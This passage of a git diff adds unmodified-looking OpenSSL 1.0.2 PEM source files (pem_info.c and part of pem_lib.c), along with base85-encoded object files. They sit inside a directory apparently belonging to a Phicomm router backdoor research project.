z^Zp3C#p0GTe^iMB5j&e~mF1T68*w|#->l?VZfzlfp%=MhsC}rr2S<Qq9|*HiNhT8m
z)^!=It1&A(GLX5$fe4?LXT<$YXop^S{pglwcioU?(3aGQb~>E~qHDLe=)@?pq5nJB
z#s_}D=?`?uFoqM_oaxR@?z=n;Srtm<vRiL>r|w~C-;G3g5!51ZWEt9|V;dH=eBo7q
zVP;~_l_&U>0CwsL4_GCNfK?m5&jZAQhTsgZX*m*J^-{*QAZE?5(d40M0SkHEWBlAb
z3q7C9=KnBR<kH=lf3P5HrvE|4l&i}u285~iq|QppF|5g-!}AR4U-?VOrJ6ZZT~z-?
z9YkOCS9V>)^wg#vXujepi2Beg>$rQ272iQ$7ur>q6AY-P$-k3H=3XZM81v{g7i7LN
zPjb*H2@Im8ITc^w-Fg${fj%fNiGd-sRKw&GX5Jl9?qz?60!<{GBID?F<3G#9TAG<S
GCjS%KS5K_~

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_info.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_info.c
new file mode 100644
index 0000000..68747d1
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_info.c
@@ -0,0 +1,388 @@
+/* crypto/pem/pem_info.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_DSA
+# include <openssl/dsa.h>
+#endif
+
+#ifndef OPENSSL_NO_FP_API
+STACK_OF(X509_INFO) *PEM_X509_INFO_read(FILE *fp, STACK_OF(X509_INFO) *sk,
+                                        pem_password_cb *cb, void *u)
+{
+    BIO *b;
+    STACK_OF(X509_INFO) *ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        PEMerr(PEM_F_PEM_X509_INFO_READ, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = PEM_X509_INFO_read_bio(b, sk, cb, u);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+STACK_OF(X509_INFO) *PEM_X509_INFO_read_bio(BIO *bp, STACK_OF(X509_INFO) *sk,
+                                            pem_password_cb *cb, void *u)
+{
+    X509_INFO *xi = NULL;
+    char *name = NULL, *header = NULL;
+    void *pp;
+    unsigned char *data = NULL;
+    const unsigned char *p;
+    long len, error = 0;
+    int ok = 0;
+    STACK_OF(X509_INFO) *ret = NULL;
+    unsigned int i, raw, ptype;
+    d2i_of_void *d2i = 0;
+
+    if (sk == NULL) {
+        if ((ret = sk_X509_INFO_new_null()) == NULL) {
+            PEMerr(PEM_F_PEM_X509_INFO_READ_BIO, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    } else
+        ret = sk;
+
+    if ((xi = X509_INFO_new()) == NULL)
+        goto err;
+    for (;;) {
+        raw = 0;
+        ptype = 0;
+        i = PEM_read_bio(bp, &name, &header, &data, &len);
+        if (i == 0) {
+            error = ERR_GET_REASON(ERR_peek_last_error());
+            if (error == PEM_R_NO_START_LINE) {
+                ERR_clear_error();
+                break;
+            }
+            goto err;
+        }
+ start:
+        if ((strcmp(name, PEM_STRING_X509) == 0) ||
+            (strcmp(name, PEM_STRING_X509_OLD) == 0)) {
+            d2i = (D2I_OF(void)) d2i_X509;
+            if (xi->x509 != NULL) {
+                if (!sk_X509_INFO_push(ret, xi))
+                    goto err;
+                if ((xi = X509_INFO_new()) == NULL)
+                    goto err;
+                goto start;
+            }
+            pp = &(xi->x509);
+        } else if ((strcmp(name, PEM_STRING_X509_TRUSTED) == 0)) {
+            d2i = (D2I_OF(void)) d2i_X509_AUX;
+            if (xi->x509 != NULL) {
+                if (!sk_X509_INFO_push(ret, xi))
+                    goto err;
+                if ((xi = X509_INFO_new()) == NULL)
+                    goto err;
+                goto start;
+            }
+            pp = &(xi->x509);
+        } else if (strcmp(name, PEM_STRING_X509_CRL) == 0) {
+            d2i = (D2I_OF(void)) d2i_X509_CRL;
+            if (xi->crl != NULL) {
+                if (!sk_X509_INFO_push(ret, xi))
+                    goto err;
+                if ((xi = X509_INFO_new()) == NULL)
+                    goto err;
+                goto start;
+            }
+            pp = &(xi->crl);
+        } else
+#ifndef OPENSSL_NO_RSA
+        if (strcmp(name, PEM_STRING_RSA) == 0) {
+            d2i = (D2I_OF(void)) d2i_RSAPrivateKey;
+            if (xi->x_pkey != NULL) {
+                if (!sk_X509_INFO_push(ret, xi))
+                    goto err;
+                if ((xi = X509_INFO_new()) == NULL)
+                    goto err;
+                goto start;
+            }
+
+            xi->enc_data = NULL;
+            xi->enc_len = 0;
+
+            xi->x_pkey = X509_PKEY_new();
+            ptype = EVP_PKEY_RSA;
+            pp = &xi->x_pkey->dec_pkey;
+            if ((int)strlen(header) > 10) /* assume encrypted */
+                raw = 1;
+        } else
+#endif
+#ifndef OPENSSL_NO_DSA
+        if (strcmp(name, PEM_STRING_DSA) == 0) {
+            d2i = (D2I_OF(void)) d2i_DSAPrivateKey;
+            if (xi->x_pkey != NULL) {
+                if (!sk_X509_INFO_push(ret, xi))
+                    goto err;
+                if ((xi = X509_INFO_new()) == NULL)
+                    goto err;
+                goto start;
+            }
+
+            xi->enc_data = NULL;
+            xi->enc_len = 0;
+
+            xi->x_pkey = X509_PKEY_new();
+            ptype = EVP_PKEY_DSA;
+            pp = &xi->x_pkey->dec_pkey;
+            if ((int)strlen(header) > 10) /* assume encrypted */
+                raw = 1;
+        } else
+#endif
+#ifndef OPENSSL_NO_EC
+        if (strcmp(name, PEM_STRING_ECPRIVATEKEY) == 0) {
+            d2i = (D2I_OF(void)) d2i_ECPrivateKey;
+            if (xi->x_pkey != NULL) {
+                if (!sk_X509_INFO_push(ret, xi))
+                    goto err;
+                if ((xi = X509_INFO_new()) == NULL)
+                    goto err;
+                goto start;
+            }
+
+            xi->enc_data = NULL;
+            xi->enc_len = 0;
+
+            xi->x_pkey = X509_PKEY_new();
+            ptype = EVP_PKEY_EC;
+            pp = &xi->x_pkey->dec_pkey;
+            if ((int)strlen(header) > 10) /* assume encrypted */
+                raw = 1;
+        } else
+#endif
+        {
+            d2i = NULL;
+            pp = NULL;
+        }
+
+        if (d2i != NULL) {
+            if (!raw) {
+                EVP_CIPHER_INFO cipher;
+
+                if (!PEM_get_EVP_CIPHER_INFO(header, &cipher))
+                    goto err;
+                if (!PEM_do_header(&cipher, data, &len, cb, u))
+                    goto err;
+                p = data;
+                if (ptype) {
+                    if (!d2i_PrivateKey(ptype, pp, &p, len)) {
+                        PEMerr(PEM_F_PEM_X509_INFO_READ_BIO, ERR_R_ASN1_LIB);
+                        goto err;
+                    }
+                } else if (d2i(pp, &p, len) == NULL) {
+                    PEMerr(PEM_F_PEM_X509_INFO_READ_BIO, ERR_R_ASN1_LIB);
+                    goto err;
+                }
+            } else {            /* encrypted RSA data */
+                if (!PEM_get_EVP_CIPHER_INFO(header, &xi->enc_cipher))
+                    goto err;
+                xi->enc_data = (char *)data;
+                xi->enc_len = (int)len;
+                data = NULL;
+            }
+        } else {
+            /* unknown */
+        }
+        if (name != NULL)
+            OPENSSL_free(name);
+        if (header != NULL)
+            OPENSSL_free(header);
+        if (data != NULL)
+            OPENSSL_free(data);
+        name = NULL;
+        header = NULL;
+        data = NULL;
+    }
+
+    /*
+     * if the last one hasn't been pushed yet and there is anything in it
+     * then add it to the stack ...
+     */
+    if ((xi->x509 != NULL) || (xi->crl != NULL) ||
+        (xi->x_pkey != NULL) || (xi->enc_data != NULL)) {
+        if (!sk_X509_INFO_push(ret, xi))
+            goto err;
+        xi = NULL;
+    }
+    ok = 1;
+ err:
+    if (xi != NULL)
+        X509_INFO_free(xi);
+    if (!ok) {
+        for (i = 0; ((int)i) < sk_X509_INFO_num(ret); i++) {
+            xi = sk_X509_INFO_value(ret, i);
+            X509_INFO_free(xi);
+        }
+        if (ret != sk)
+            sk_X509_INFO_free(ret);
+        ret = NULL;
+    }
+
+    if (name != NULL)
+        OPENSSL_free(name);
+    if (header != NULL)
+        OPENSSL_free(header);
+    if (data != NULL)
+        OPENSSL_free(data);
+    return (ret);
+}
+
+/* A TJH addition */
+int PEM_X509_INFO_write_bio(BIO *bp, X509_INFO *xi, EVP_CIPHER *enc,
+                            unsigned char *kstr, int klen,
+                            pem_password_cb *cb, void *u)
+{
+    EVP_CIPHER_CTX ctx;
+    int i, ret = 0;
+    unsigned char *data = NULL;
+    const char *objstr = NULL;
+    char buf[PEM_BUFSIZE];
+    unsigned char *iv = NULL;
+
+    if (enc != NULL) {
+        objstr = OBJ_nid2sn(EVP_CIPHER_nid(enc));
+        if (objstr == NULL) {
+            PEMerr(PEM_F_PEM_X509_INFO_WRITE_BIO, PEM_R_UNSUPPORTED_CIPHER);
+            goto err;
+        }
+    }
+
+    /*
+     * now for the fun part ... if we have a private key then we have to be
+     * able to handle a not-yet-decrypted key being written out correctly ...
+     * if it is decrypted or it is non-encrypted then we use the base code
+     */
+    if (xi->x_pkey != NULL) {
+        if ((xi->enc_data != NULL) && (xi->enc_len > 0)) {
+            if (enc == NULL) {
+                PEMerr(PEM_F_PEM_X509_INFO_WRITE_BIO, PEM_R_CIPHER_IS_NULL);
+                goto err;
+            }
+
+            /* copy from weirdo names into more normal things */
+            iv = xi->enc_cipher.iv;
+            data = (unsigned char *)xi->enc_data;
+            i = xi->enc_len;
+
+            /*
+             * we take the encryption data from the internal stuff rather
+             * than what the user has passed us ... as we have to match
+             * exactly for some strange reason
+             */
+            objstr = OBJ_nid2sn(EVP_CIPHER_nid(xi->enc_cipher.cipher));
+            if (objstr == NULL) {
+                PEMerr(PEM_F_PEM_X509_INFO_WRITE_BIO,
+                       PEM_R_UNSUPPORTED_CIPHER);
+                goto err;
+            }
+
+            /* create the right magic header stuff */
+            OPENSSL_assert(strlen(objstr) + 23 + 2 * enc->iv_len + 13 <=
+                           sizeof buf);
+            buf[0] = '\0';
+            PEM_proc_type(buf, PEM_TYPE_ENCRYPTED);
+            PEM_dek_info(buf, objstr, enc->iv_len, (char *)iv);
+
+            /* use the normal code to write things out */
+            i = PEM_write_bio(bp, PEM_STRING_RSA, buf, data, i);
+            if (i <= 0)
+                goto err;
+        } else {
+            /* Add DSA/DH */
+#ifndef OPENSSL_NO_RSA
+            /* normal optionally encrypted stuff */
+            if (PEM_write_bio_RSAPrivateKey(bp,
+                                            xi->x_pkey->dec_pkey->pkey.rsa,
+                                            enc, kstr, klen, cb, u) <= 0)
+                goto err;
+#endif
+        }
+    }
+
+    /* if we have a certificate then write it out now */
+    if ((xi->x509 != NULL) && (PEM_write_bio_X509(bp, xi->x509) <= 0))
+        goto err;
+
+    /*
+     * we are ignoring anything else that is loaded into the X509_INFO
+     * structure for the moment ... as I don't need it so I'm not coding it
+     * here and Eric can do it when this makes it into the base library --tjh
+     */
+
+    ret = 1;
+
+ err:
+    OPENSSL_cleanse((char *)&ctx, sizeof(ctx));
+    OPENSSL_cleanse(buf, PEM_BUFSIZE);
+    return (ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_info.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_info.o
new file mode 100644
index 0000000000000000000000000000000000000000..a96a410260f3a8e6cd079be9edd2e70d1dcaf7d5
GIT binary patch
literal 7152
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
SZCa@R2hRNQ{{@=d{r>~VAvih!

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_lib.c
new file mode 100644
index 0000000..a29821a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/pem/pem_lib.c
@@ -0,0 +1,865 @@
+/* crypto/pem/pem_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include <ctype.h>
+#include "cryptlib.h"
+#include <openssl/buffer.h>
+#include <openssl/objects.h>
+#include <openssl/evp.h>
+#include <openssl/rand.h>
+#include <openssl/x509.h>
+#include <openssl/pem.h>
+#include <openssl/pkcs12.h>
+#include "asn1_locl.h"
+#ifndef OPENSSL_NO_DES
+# include <openssl/des.h>
+#endif
+#ifndef OPENSSL_NO_ENGINE
+# include <openssl/engine.h>
+#endif
+
+const char PEM_version[] = "PEM" OPENSSL_VERSION_PTEXT;
+
+#define MIN_LENGTH      4
+
+static int load_iv(char **fromp, unsigned char *to, int num);
+static int check_pem(const char *nm, const char *name);
+int pem_check_suffix(const char *pem_str, const char *suffix);
+
+int PEM_def_callback(char *buf, int num, int w, void *key)
+{
+#ifdef OPENSSL_NO_FP_API
+    /*
+     * We should not ever call the default callback routine from windows.
+     */
+    PEMerr(PEM_F_PEM_DEF_CALLBACK, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+    return (-1);
+#else
+    int i, j;
+    const char *prompt;
+    if (key) {
+        i = strlen(key);
+        i = (i > num) ? num : i;
+        memcpy(buf, key, i);
+        return (i);
+    }
+
+    prompt = EVP_get_pw_prompt();
+    if (prompt == NULL)
+        prompt = "Enter PEM pass phrase:";
+
+    for (;;) {
+        i = EVP_read_pw_string_min(buf, MIN_LENGTH, num, prompt, w);
+        if (i != 0) {
+            PEMerr(PEM_F_PEM_DEF_CALLBACK, PEM_R_PROBLEMS_GETTING_PASSWORD);
+            memset(buf, 0, (unsigned int)num);
+            return (-1);
+        }
+        j = strlen(buf);
+        if (j < MIN_LENGTH) {
+            fprintf(stderr,
+                    "phrase is too short, needs to be at least %d chars\n",
+                    MIN_LENGTH);
+        } else
+            break;
+    }
+    return (j);
+#endif
+}
+
+void PEM_proc_type(char *buf, int type)
+{
+    const char *str;
+
+    if (type == PEM_TYPE_ENCRYPTED)
+        str = "ENCRYPTED";
+    else if (type == PEM_TYPE_MIC_CLEAR)
+        str = "MIC-CLEAR";
+    else if (type == PEM_TYPE_MIC_ONLY)
+        str = "MIC-ONLY";
+    else
+        str = "BAD-TYPE";
+
+    BUF_strlcat(buf, "Proc-Type: 4,", PEM_BUFSIZE);
+    BUF_strlcat(buf, str, PEM_BUFSIZE);
+    BUF_strlcat(buf, "\n", PEM_BUFSIZE);
+}
+
+void PEM_dek_info(char *buf, const char *type, int len, char *str)
+{
+    static const unsigned char map[17] = "0123456789ABCDEF";
+    long i;
+    int j;
+
+    BUF_strlcat(buf, "DEK-Info: ", PEM_BUFSIZE);
+    BUF_strlcat(buf, type, PEM_BUFSIZE);
+    BUF_strlcat(buf, ",", PEM_BUFSIZE);
+    j = strlen(buf);
+    if (j + (len * 2) + 1 > PEM_BUFSIZE)
+        return;
+    for (i = 0; i < len; i++) {
+        buf[j + i * 2] = map[(str[i] >> 4) & 0x0f];
+        buf[j + i * 2 + 1] = map[(str[i]) & 0x0f];
+    }
+    buf[j + i * 2] = '\n';
+    buf[j + i * 2 + 1] = '\0';
+}
+
+#ifndef OPENSSL_NO_FP_API
+void *PEM_ASN1_read(d2i_of_void *d2i, const char *name, FILE *fp, void **x,
+                    pem_password_cb *cb, void *u)
+{
+    BIO *b;
+    void *ret;
+
+    if ((b = BIO_new(BIO_s_file())) == NULL) {
+        PEMerr(PEM_F_PEM_ASN1_READ, ERR_R_BUF_LIB);
+        return (0);
+    }
+    BIO_set_fp(b, fp, BIO_NOCLOSE);
+    ret = PEM_ASN1_read_bio(d2i, name, b, x, cb, u);
+    BIO_free(b);
+    return (ret);
+}
+#endif
+
+static int check_pem(const char *nm, const char *name)
+{
+    /* Normal matching nm and name */
+    if (!strcmp(nm, name))
+        return 1;
+
+    /* Make PEM_STRING_EVP_PKEY match any private key */
+
+    if (!strcmp(name, PEM_STRING_EVP_PKEY)) {
+        int slen;
+        const EVP_PKEY_ASN1_METHOD *ameth;
+        if (!strcmp(nm, PEM_STRING_PKCS8))
+            return 1;
+        if (!strcmp(nm, PEM_STRING_PKCS8INF))
+            return 1;
+        slen = pem_check_suffix(nm, "PRIVATE KEY");
+        if (slen > 0) {
+            /*
+             * NB: ENGINE implementations wont contain a deprecated old
+             * private key decode function so don't look for them.
+             */
+            ameth = EVP_PKEY_asn1_find_str(NULL, nm, slen);
+            if (ameth && ameth->old_priv_decode)
+                return 1;
+        }
+        return 0;
+    }
+
+    if (!strcmp(name, PEM_STRING_PARAMETERS)) {
+        int slen;
+        const EVP_PKEY_ASN1_METHOD *ameth;
+        slen = pem_check_suffix(nm, "PARAMETERS");
+        if (slen > 0) {
+            ENGINE *e;
+            ameth = EVP_PKEY_asn1_find_str(&e, nm, slen);
+            if (ameth) {
+                int r;
+                if (ameth->param_decode)
+                    r = 1;
+                else
+                    r = 0;
+#ifndef OPENSSL_NO_ENGINE
+                if (e)
+                    ENGINE_finish(e);
+#endif
+                return r;
+            }
+        }
+        return 0;
+    }
+    /* If reading DH parameters handle X9.42 DH format too */
+    if (!strcmp(nm, PEM_STRING_DHXPARAMS) &&
+        !strcmp(name, PEM_STRING_DHPARAMS))
+        return 1;
+
